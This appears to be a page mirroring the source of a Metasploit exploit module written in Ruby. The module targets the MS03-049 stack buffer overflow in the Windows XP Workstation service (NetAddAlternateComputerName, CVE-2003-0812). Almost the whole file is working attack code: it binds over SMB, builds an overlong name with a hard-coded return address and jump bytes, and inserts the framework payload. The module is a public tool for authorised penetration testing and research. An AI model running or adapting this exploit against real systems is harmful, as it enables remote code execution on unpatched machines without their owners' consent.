Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms03_049_netapi.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName

19
          function using the Workstation service in Windows XP.

20
        },

21
        'Author' => [ 'hdm' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2003-0812' ],

25
          [ 'OSVDB', '11461' ],

26
          [ 'BID', '9011' ],

27
          [ 'MSB', 'MS03-049' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'thread',

31
        },

32
        'Privileged' => true,

33
        'Payload' => {

34
          'Space' => 1000,

35
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" + [*(0x80..0x9f)].pack('C*'),

36
          'StackAdjustment' => -3500,

37
        },

38
        'Platform' => 'win',

39
        'DefaultTarget' => 0,

40
        'Targets' => [

41
          [

42
            'Windows XP SP0/SP1',

43
            {

44
              'Ret' => 0x71aa32ad # pop/pop/ret in ws2help.dll

45
            }

46
          ],

47
        ],

48
        'DisclosureDate' => '2003-11-11',

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, WKSSVC)", 'BROWSER']),

60
      ]

61
    )

62
  end

63


64
  def exploit

65
    connect()

66
    smb_login()

67


68
    handle = dcerpc_handle(

69
      '6bffd098-a112-3610-9833-46c3f87e345a', '1.0',

70
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]

71
    )

72


73
    print_status("Binding to #{handle} ...")

74
    dcerpc_bind(handle)

75
    print_status("Bound to #{handle} ...")

76


77
    print_status("Building the stub data...")

78


79
    name = rand_text_alphanumeric(5000)

80
    name[3496, 4] = [target.ret].pack('V')

81
    name[3492, 2] = "\xeb\x06"

82
    name[3500, 5] = "\xe9" + [-3505].pack('V')

83
    name[0, payload.encoded.length] = payload.encoded

84


85
    stub =

86
      NDR.long(rand(0xffffffff)) +

87
      NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +

88
      NDR.long(rand(0xffffffff)) +

89
      NDR.UnicodeConformantVaryingString(name) +

90
      NDR.long(rand(0xffffffff)) +

91
      NDR.UnicodeConformantVaryingString('') +

92
      NDR.long(0) +

93
      NDR.long(0)

94


95
    print_status("Calling the vulnerable function...")

96


97
    begin

98
      dcerpc.call(0x1b, stub)

99
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

100
    rescue => e

101
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/

102
        raise e

103
      end

104
    end

105


106
    # Cleanup

107
    handler

108
    disconnect

109
  end

110
end

111


112